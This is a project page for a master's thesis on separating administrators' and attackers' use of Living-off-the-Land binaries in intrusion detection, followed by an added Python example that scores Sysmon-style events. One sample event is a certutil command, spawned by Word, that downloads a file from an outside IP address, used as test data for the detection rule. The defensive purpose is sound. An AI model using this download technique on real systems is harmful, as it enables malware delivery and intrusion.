- Supervisors: Dr. Emre Süren | Teodor Sommestad
- Author: Peter Daniel
- Status: completed 🟠
- Started: 2024-08
- Ended: 2025-07
Parent project: Digital Forensics
A notable trend among malicious actors in the threat landscape is the adoption of Living-off-the-Land (LotL) binaries -- legitimate system utilities already present on the system -- as a defense evasion mechanism. The dual use of these techniques by administrators and attackers alike has blurred the line between benign and malicious activity, triggering numerous false alarms in Intrusion Detection Systems (IDS), diminishing their efficacy and overwhelming security teams. This thesis investigates the challenges of accurately distinguishing between legitimate and adversarial use of LotL techniques, focusing on how overlapping techniques impact IDS performance. To identify these intersecting LotL techniques, the study leveraged the MITRE ATT&CK® framework, the LOLBAS Project, and Sigma detection signatures, alongside interviews and surveys with practitioners. A subset of administrative tasks that resemble adversarial behaviors was automated and simulated in the Cyber Range And Training Environment (CRATE), while the Atomic Red Team framework was used to emulate malicious actions. Detection accuracy was evaluated using the signature-based IDS tools Snort, Sysmon and Wazuh. The findings show that, despite using the same binaries and triggering identical signatures, there are subtle behavioral differences between benign and malicious usage of these binaries. Although all the activities generated by the simulations were captured by the security monitoring tools, contextual analysis was required to further distinguish between the two kinds of activity. Key recommendations include refining detection signatures and incorporating contextual analysis and anomaly detection to enhance IDS capabilities.
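To make the central finding concrete (same binary, same signature hit, different context), here is an added Python example that is not code from the thesis or its authors: a Sigma-style signature match over constructed Sysmon-like process-creation events, followed by a contextual score. The certutil rule, the trusted-parent list, the internal PKI host name and both sample events are assumptions made for the illustration.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 (process creation) fields."""
    image: str
    command_line: str
    parent_image: str
    user: str
    integrity_level: str

def signature_hit(ev: ProcEvent) -> bool:
    """Sigma-style signature: certutil.exe asked to fetch a URL (assumed rule)."""
    cmd = ev.command_line.lower()
    return ev.image.lower().endswith("\\certutil.exe") and "-urlcache" in cmd and "http" in cmd

# Assumed environment knowledge (hypothetical values, not from the thesis).
TRUSTED_PARENTS = ("\\ccmexec.exe", "\\svchost.exe")   # known management agents
OFFICE_PARENTS = ("\\winword.exe", "\\excel.exe", "\\outlook.exe")
INTERNAL_PKI_HOST = "pki.corp.example"

def context_score(ev: ProcEvent) -> int:
    """Contextual indicators layered on top of an identical signature hit."""
    parent, cmd, score = ev.parent_image.lower(), ev.command_line.lower(), 0
    if parent.endswith(OFFICE_PARENTS):
        score += 3          # user-facing document app spawning a system utility
    if not parent.endswith(TRUSTED_PARENTS):
        score += 1          # not launched by the known admin tooling
    if INTERNAL_PKI_HOST not in cmd:
        score += 2          # download source is not the internal PKI host
    if ev.integrity_level.lower() == "high":
        score += 1          # elevated interactive session rather than SYSTEM
    return score

def classify(ev: ProcEvent, threshold: int = 4) -> str:
    """Signature alone fires for both events; context separates them."""
    if not signature_hit(ev):
        return "no-alert"
    return "suspicious" if context_score(ev) >= threshold else "benign-admin"

# Constructed sample events: same binary, same switches, different context.
ADMIN_CRL_REFRESH = ProcEvent(
    "C:\\Windows\\System32\\certutil.exe",
    "certutil -urlcache -split -f http://pki.corp.example/crl/root.crl C:\\ProgramData\\root.crl",
    "C:\\Windows\\CCM\\CcmExec.exe", "NT AUTHORITY\\SYSTEM", "System")
DOC_SPAWNED_FETCH = ProcEvent(
    "C:\\Windows\\System32\\certutil.exe",
    "certutil -urlcache -split -f http://203.0.113.10/file.dat C:\\Users\\Public\\file.dat",
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CORP\\alice", "High")
```

Both events trip the signature; only the parent process, download source and integrity level tell the scheduled CRL refresh apart from the document-spawned fetch.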
This project is run by the Royal Hacking Lab within Cybercampus Sverige.

